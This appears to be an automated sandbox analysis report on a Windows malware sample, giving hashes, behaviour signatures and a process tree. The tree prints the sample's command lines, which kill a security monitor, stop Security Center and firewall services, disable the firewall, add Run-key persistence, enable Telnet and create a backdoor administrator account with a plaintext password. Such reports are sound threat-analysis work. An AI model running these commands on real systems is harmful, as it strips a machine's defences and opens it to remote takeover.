Analysis
-
max time kernel
143s -
max time network
203s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
06-12-2022 02:31
Static task
static1
Behavioral task
behavioral1
Sample
be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
Resource
win10v2004-20220812-en
General
-
Target
be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe
-
Size
404KB
-
MD5
5e092c515f6f47a16d70407410ab4577
-
SHA1
5b3b364c29c7a833c9de8bda9cc109a7e14194cc
-
SHA256
be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913
-
SHA512
ae112ce5b34905b538e4753fbfb6b2346c47e3079613c6600591100ae52a0664a952c2a2a96dec32639358b27cb8376ea7f73f5d89cf3d9b495de88686582f73
-
SSDEEP
6144:sLHMgD1LBUpzEtSLA7I85O2AGwbIPLN9MyKMCjlHzgD:BgvVtSU8cS69My0g
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 1320 netsh.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.NET = "C:\\Windows\\system\\lssm.exe" be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\system\d1ctt.dll be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe File opened for modification C:\Windows\k1.Reg be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe File opened for modification C:\Windows\exec.bat be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe File created C:\Windows\system\lssm.exe be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe File opened for modification C:\Windows\system\lssm.exe be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1636 sc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Processornamestring be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe -
Kills process with taskkill 2 IoCs
pid Process 992 taskkill.exe 1956 taskkill.exe -
Runs .reg file with regedit 2 IoCs
pid Process 1116 regedit.exe 1504 regedit.exe -
Runs net.exe
-
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 992 taskkill.exe Token: SeDebugPrivilege 1956 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1084 wrote to memory of 992 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 27 PID 1084 wrote to memory of 992 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 27 PID 1084 wrote to memory of 992 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 27 PID 1084 wrote to memory of 992 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 27 PID 1084 wrote to memory of 1724 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 29 PID 1084 wrote to memory of 1724 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 29 PID 1084 wrote to memory of 1724 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 29 PID 1084 wrote to memory of 1724 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 29 PID 1084 wrote to memory of 1060 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 31 PID 1084 wrote to memory of 1060 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 31 PID 1084 wrote to memory of 1060 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 31 PID 1084 wrote to memory of 1060 1084 be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe 31 PID 1724 wrote to memory of 2000 1724 cmd.exe 33 PID 1724 wrote to memory of 2000 1724 cmd.exe 33 PID 1724 wrote to memory of 2000 1724 cmd.exe 33 PID 1724 wrote to memory of 2000 1724 cmd.exe 33 PID 1060 wrote to memory of 1956 1060 cmd.exe 34 PID 1060 wrote to memory of 1956 1060 cmd.exe 34 PID 1060 wrote to memory of 1956 1060 cmd.exe 34 PID 1060 wrote to memory of 1956 1060 cmd.exe 34 PID 2000 wrote to memory of 584 2000 net.exe 35 PID 2000 wrote to memory of 584 2000 net.exe 35 PID 2000 wrote to memory of 584 2000 net.exe 35 PID 2000 wrote to memory of 584 2000 net.exe 35 PID 1724 wrote to memory of 828 1724 cmd.exe 36 PID 1724 wrote to memory of 828 1724 cmd.exe 36 PID 1724 wrote to memory of 828 1724 cmd.exe 36 PID 1724 wrote to memory of 828 1724 cmd.exe 36 PID 828 wrote to memory of 1804 828 net.exe 37 PID 828 wrote to memory of 1804 828 net.exe 37 PID 828 wrote to memory of 1804 828 net.exe 37 PID 828 wrote to memory of 1804 828 net.exe 37 PID 1724 wrote to memory of 1568 1724 cmd.exe 38 PID 1724 wrote to memory of 1568 1724 cmd.exe 38 PID 1724 wrote to memory of 1568 1724 cmd.exe 38 PID 1724 wrote to memory of 1568 1724 cmd.exe 38 PID 1568 wrote to memory of 552 1568 net.exe 39 PID 1568 wrote to memory of 552 1568 net.exe 39 PID 1568 wrote to memory of 552 1568 net.exe 39 PID 1568 wrote to memory of 552 1568 net.exe 39 PID 1724 wrote to memory of 672 1724 cmd.exe 41 PID 1724 wrote to memory of 672 1724 cmd.exe 41 PID 1724 wrote to memory of 672 1724 cmd.exe 41 PID 1724 wrote to memory of 672 1724 cmd.exe 41 PID 672 wrote to memory of 2012 672 net.exe 42 PID 672 wrote to memory of 2012 672 net.exe 42 PID 672 wrote to memory of 2012 672 net.exe 42 PID 672 wrote to memory of 2012 672 net.exe 42 PID 1724 wrote to memory of 1320 1724 cmd.exe 43 PID 1724 wrote to memory of 1320 1724 cmd.exe 43 PID 1724 wrote to memory of 1320 1724 cmd.exe 43 PID 1724 wrote to memory of 1320 1724 cmd.exe 43 PID 1060 wrote to memory of 1636 1060 cmd.exe 44 PID 1060 wrote to memory of 1636 1060 cmd.exe 44 PID 1060 wrote to memory of 1636 1060 cmd.exe 44 PID 1060 wrote to memory of 1636 1060 cmd.exe 44 PID 1060 wrote to memory of 1208 1060 cmd.exe 45 PID 1060 wrote to memory of 1208 1060 cmd.exe 45 PID 1060 wrote to memory of 1208 1060 cmd.exe 45 PID 1060 wrote to memory of 1208 1060 cmd.exe 45 PID 1060 wrote to memory of 1504 1060 cmd.exe 46 PID 1060 wrote to memory of 1504 1060 cmd.exe 46 PID 1060 wrote to memory of 1504 1060 cmd.exe 46 PID 1060 wrote to memory of 1504 1060 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe"C:\Users\Admin\AppData\Local\Temp\be3c004bb53832972fa9fbef4a77f5a270b5a1da74b0f4598a82d5f1d5962913.exe"1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im WinPatrol.exe /f /t2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\exec.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\net.exenet stop Security Center3⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Security Center4⤵PID:584
-
-
-
C:\Windows\SysWOW64\net.exenet start SharedAccess3⤵
- Suspicious use of WriteProcessMemory
PID:828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SharedAccess4⤵PID:1804
-
-
-
C:\Windows\SysWOW64\net.exenet stop Micorsoft Network Firewall Service3⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Micorsoft Network Firewall Service4⤵PID:552
-
-
-
C:\Windows\SysWOW64\net.exenet stop "Windows Firewall/Internet Connection Sharing (ICS)"3⤵
- Suspicious use of WriteProcessMemory
PID:672 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Windows Firewall/Internet Connection Sharing (ICS)"4⤵PID:2012
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1320
-
-
C:\Windows\SysWOW64\regedit.exeregedit /sk1.Reg3⤵
- Runs .reg file with regedit
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\t3l.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im tlntsvr.exe /f /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc config TlntSvr start= auto3⤵
- Launches sc.exe
PID:1636
-
-
C:\Windows\SysWOW64\reg.exeREG IMPORT keyADD.reg3⤵PID:1208
-
-
C:\Windows\SysWOW64\regedit.exeREGEDIT.EXE /s keyADD.reg3⤵
- Runs .reg file with regedit
PID:1504
-
-
C:\Windows\SysWOW64\net.exeNET LOCALGROUP TelnetClients /ADD3⤵PID:1360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 LOCALGROUP TelnetClients /ADD4⤵PID:1556
-
-
-
C:\Windows\SysWOW64\net.exeNET LOCALGROUP TelnetClients Administrator /ADD3⤵PID:632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 LOCALGROUP TelnetClients Administrator /ADD4⤵PID:568
-
-
-
C:\Windows\SysWOW64\net.exeNET LOCALGROUP Administrators Administrator /ADD3⤵PID:432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 LOCALGROUP Administrators Administrator /ADD4⤵PID:456
-
-
-
C:\Windows\SysWOW64\net.exeNET USER administrator nebunu001 /add3⤵PID:112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 USER administrator nebunu001 /add4⤵PID:1200
-
-
-
C:\Windows\SysWOW64\net.exenet USER administrator nebunu0013⤵PID:1076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 USER administrator nebunu0014⤵PID:1840
-
-
-
C:\Windows\SysWOW64\net.exenet start TlntSvr3⤵PID:1612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TlntSvr4⤵PID:1660
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
899B
MD5fd1d5cb5341d5308bdaaf1178c165cbf
SHA1fc4ce8540aa0cbe164812a8e6b66ebc5911fdbef
SHA2565f2f60c51e57055275330a1a1559b1283bfb1fd24a7a452f9b541355f9871e45
SHA512844404b4c71402691b4babb53ac030dbc8c996718935c5d3855e51d7ec681fc511b0f44734931b8ac7f2898feeba5881c931c255eda9fbe65035fc2393c3fdfb
-
Filesize
394B
MD58c2bc98974858dfaaa46eac37926aec6
SHA1e48171c2422edee6abe18a942ca97d283d065df0
SHA2560109517d6908e778ee5480d8789575fb737fb9636bf4cfe517d562b8fbaecb87
SHA5127cc3f89baceffcc99aa65be71dc97a61b243a0ea36c3842ddbc029ee1475b8a97266d9a127551b771f56a7ff06a1c84f05d5e4bd461731b90bae27f4a7694e75
-
Filesize
281B
MD5281504796ab276be9b4725ce7143ee6d
SHA15e47b5e152a4ebb92e397de2c4defd0395028c8b
SHA256d6e7f799fc9a879fd2009006c570a3ef034b8da092dc23ef73f1259ec38e5946
SHA512e301eaf63468c7c364bfaa83ef0c6cc69fd4879a5f12f2968fa06207b6a149af4eb1340cd1ea690a14bbcbb07764453e901f94c5d991e97c8b1cb509469ad9bf